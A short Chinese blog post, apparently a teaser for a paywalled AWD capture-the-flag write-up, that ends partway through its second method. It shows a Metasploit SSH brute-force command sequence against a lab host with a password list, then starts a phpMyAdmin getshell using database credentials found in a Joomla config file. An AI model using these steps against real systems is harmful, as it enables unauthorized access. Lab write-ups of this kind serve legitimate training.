更多详情私聊博主
订阅专栏解锁更多~~觉得不错麻烦点个赞~~~
AWD_writeup 主要考点:后门账户、数据库操作、cve漏洞、后门漏洞、自动化攻击 1、解法一 ssh弱口令账户 用户登录后cat /etc/passwd 发现系统存在额外账户
使用msf进行ssh爆破尝试 msfconsole use auxiliary/scanner/ssh/ssh_login set rhost 192.168.2.162 set rport 22 set username administrator set pass_file /root/Desktop/top100.txt set verbose true run
2、解法二 phpmyadmin getshell 发现站点phpmyadmin 并且在 configuration.php文件中发现数据库连接用户和密码均为joomla
尝试登录,发现登录成功 执行 s
